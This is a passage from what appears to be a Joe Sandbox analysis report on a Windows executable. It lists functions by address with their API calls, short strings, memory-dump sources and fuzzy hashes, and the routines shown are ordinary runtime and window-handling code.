                                                                                                                    • Opcode Fuzzy Hash: 64d9c3cb7b5de17515fad991fab36aed20c74e14fc7f9fd3c19d97b8fd4a0418
                                                                                                                    • Instruction Fuzzy Hash: CD313A32608781CBE7709F28B844B5AB7A1F795790F505235EBA803BA9CB3CD851CF40
                                                                                                                    Function 00007FF7BB889BD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                                                    • String ID: edit
                                                                                                                    • API String ID: 2978978980-2167791130
                                                                                                                    • Opcode ID: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
                                                                                                                    • Instruction ID: ceac591e19bbf085bfe98d2ae2e4ea72fd3c54ca025e2cbaf157e5b8e7be22a9
                                                                                                                    • Opcode Fuzzy Hash: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
                                                                                                                    • Instruction Fuzzy Hash: F4314C36A08781CBE770DB19E84475AB7A1F795790F504235EBA843BACDB3DD841CB50
                                                                                                                    Function 00007FF7BB81FD90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _handle_error
                                                                                                                    • String ID: "$pow
                                                                                                                    • API String ID: 1757819995-713443511
                                                                                                                    • Opcode ID: 2773d63829b6bc9e243f88705d039ab02ec385488ae35a30c1ce332e33ed45c5
                                                                                                                    • Instruction ID: ec72147181f177e403bacff925fbe73ec073b4ca7fcc7763fbd25e8e428eca1d
                                                                                                                    • Opcode Fuzzy Hash: 2773d63829b6bc9e243f88705d039ab02ec385488ae35a30c1ce332e33ed45c5
                                                                                                                    • Instruction Fuzzy Hash: 80216F72D1CAC587D370DF18E04066AEAA0FBEE344F601325FB890A969CBBDD4519B50
                                                                                                                    Function 00007FF7BB84DDF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 3678867486-1403004172
                                                                                                                    • Opcode ID: 97deb16edf8e784fc52f0d006fa99df0b5c043f3f1d7c65ec9baf9ca6ee38585
                                                                                                                    • Instruction ID: 01c5d87697c0287bcdc71fc1b6d847f2445c245ebee43dd81a9862e4ee4690db
                                                                                                                    • Opcode Fuzzy Hash: 97deb16edf8e784fc52f0d006fa99df0b5c043f3f1d7c65ec9baf9ca6ee38585
                                                                                                                    • Instruction Fuzzy Hash: A511A462A0878181F610EB1DD1400E9A361FBAABA0F844231DFAC477FEDE3CD515C790
                                                                                                                    Function 00007FF7BB84DCA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 3678867486-1403004172
                                                                                                                    • Opcode ID: 2b6fed8ad632b1f274e203d646578af3038472905804e24f6343927dca18ccae
                                                                                                                    • Instruction ID: 9654ec7a8c5ba5cd1c6bb5194c3a0337425ddb97d35fcaa5a631636761a390e9
                                                                                                                    • Opcode Fuzzy Hash: 2b6fed8ad632b1f274e203d646578af3038472905804e24f6343927dca18ccae
                                                                                                                    • Instruction Fuzzy Hash: BC119622A0868191FA10EB1CD0511FAA361FFAA784FC44431EF8D076BDDF2CD615CB60
                                                                                                                    Function 00007FF7BB84DD48 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 3678867486-1403004172
                                                                                                                    • Opcode ID: d39c91620d6c6e447856c574b1c807ce734865e57223a48666476f59d2f3e294
                                                                                                                    • Instruction ID: 0e68f8e06763d9aa6fd925fb29b89e0628f26bda7e933c494179c276a3724c44
                                                                                                                    • Opcode Fuzzy Hash: d39c91620d6c6e447856c574b1c807ce734865e57223a48666476f59d2f3e294
                                                                                                                    • Instruction Fuzzy Hash: E3116622A0868192FE10A71CD1512F99751FFAA784FC44131EF9D07AAEDF2CD615CB50
                                                                                                                    Function 00007FF7BB88FEA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3712363035-3916222277
                                                                                                                    • Opcode ID: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
                                                                                                                    • Instruction ID: 9c259b753ab7dc0249059bc27ef86dfffd9a6e3d6ab488644d5bfc8f2bc128ae
                                                                                                                    • Opcode Fuzzy Hash: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
                                                                                                                    • Instruction Fuzzy Hash: 7C115132A0874186E710AF1EF80415AF6A1FBA5780FC4513AEF8947A78CF3CE460CB50
                                                                                                                    Function 00007FF7BB84DEA8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 3678867486-1403004172
                                                                                                                    • Opcode ID: 2fa39eb79566fbbf5ef709d97066772d08e715fc924eaba82c6fe28b878daa18
                                                                                                                    • Instruction ID: 338f51189785de2b0fa08ebd6c3aa607f72f2e653cf7be4af662d3914134f88a
                                                                                                                    • Opcode Fuzzy Hash: 2fa39eb79566fbbf5ef709d97066772d08e715fc924eaba82c6fe28b878daa18
                                                                                                                    • Instruction Fuzzy Hash: 94015222A1C54291FA20B71CE1911F99365FFAA384FC05131EE9D07ABEDF6CD618CB60
                                                                                                                    Function 00007FF7BB8215B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                                    • String ID: !$tan
                                                                                                                    • API String ID: 3384550415-2428968949
                                                                                                                    • Opcode ID: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                                                                                    • Instruction ID: b6d81e99f2cf89c0f2ca64b610407b6efef7d480fde8a8bcf58a2aa362637336
                                                                                                                    • Opcode Fuzzy Hash: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                                                                                    • Instruction Fuzzy Hash: 92018471A28B8545DA15DF16E41033AA152BBEA7D4F604334EE5E1AB98EF7CD1508B40
                                                                                                                    Function 00007FF7BB8214E8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                                    • String ID: !$cos
                                                                                                                    • API String ID: 3384550415-1949035351
                                                                                                                    • Opcode ID: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
                                                                                                                    • Instruction ID: 345304f449b9b4913fe9e103969333bb2b62d22cc08afffc5954fe9c1b88806a
                                                                                                                    • Opcode Fuzzy Hash: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
                                                                                                                    • Instruction Fuzzy Hash: 9901D871E19B8941D615EF2AD41033AA152BFEB7D4F504334EE5E1AB98EF7DD0604B40
                                                                                                                    Function 00007FF7BB8214FC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                                    • String ID: !$sin
                                                                                                                    • API String ID: 3384550415-1565623160
                                                                                                                    • Opcode ID: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
                                                                                                                    • Instruction ID: c92867b43467839390acdcf27a13e9675fafd4844d3d140d94393c0a5c30d0d4
                                                                                                                    • Opcode Fuzzy Hash: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
                                                                                                                    • Instruction Fuzzy Hash: F401B571E18B8545D615DF2AD41033AA252BFEB7D4F504334EE5E1AB98EF6DD0504B40
                                                                                                                    Function 00007FF7BB821370 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _handle_error
                                                                                                                    • String ID: "$exp
                                                                                                                    • API String ID: 1757819995-2878093337
                                                                                                                    • Opcode ID: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
                                                                                                                    • Instruction ID: 3ed80ee45c16f66aefd4b7bd909651c4946284ae4a6c3e741f3ea5330a9f4d08
                                                                                                                    • Opcode Fuzzy Hash: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
                                                                                                                    • Instruction Fuzzy Hash: 3B01C876939B8887E221DF28D0492AAB7B1FFEA344F601315EB4416A74CB7DD4919B00
                                                                                                                    Function 00007FF7BB8075C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • try_get_function.LIBVCRUNTIME ref: 00007FF7BB8075E9
                                                                                                                    • TlsSetValue.KERNEL32(?,?,?,00007FF7BB807241,?,?,?,?,00007FF7BB80660C,?,?,?,?,00007FF7BB804CD3), ref: 00007FF7BB807600
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Valuetry_get_function
                                                                                                                    • String ID: FlsSetValue
                                                                                                                    • API String ID: 738293619-3750699315
                                                                                                                    • Opcode ID: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                                                                                    • Instruction ID: 59a2ef90b500eb6ae00fd1067f182cc04b4f706f58582a1347e7fcb00de61f02
                                                                                                                    • Opcode Fuzzy Hash: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                                                                                    • Instruction Fuzzy Hash: 5DE0A061A0864281FE096B2CE4000B9A3A1BF59B81FC86031DF5E02278CE6CE8A4C2E0
                                                                                                                    Function 00007FF7BB805620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7BB805629
                                                                                                                    • _CxxThrowException.LIBVCRUNTIME ref: 00007FF7BB80563A
                                                                                                                      • Part of subcall function 00007FF7BB807018: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7BB80563F), ref: 00007FF7BB80708D
                                                                                                                      • Part of subcall function 00007FF7BB807018: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7BB80563F), ref: 00007FF7BB8070BF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                                                                    • String ID: Unknown exception
                                                                                                                    • API String ID: 3561508498-410509341
                                                                                                                    • Opcode ID: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                                                                    • Instruction ID: 4f3d3bbc77652a93afbba393f43d720c097d66a112be85d8992adf0256d1f591
                                                                                                                    • Opcode Fuzzy Hash: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                                                                    • Instruction Fuzzy Hash: 8DD01726A18A86D1DE10FB0CD8953A8E370FBA1348FD04431EB4C425B9EF2CD65AD3A0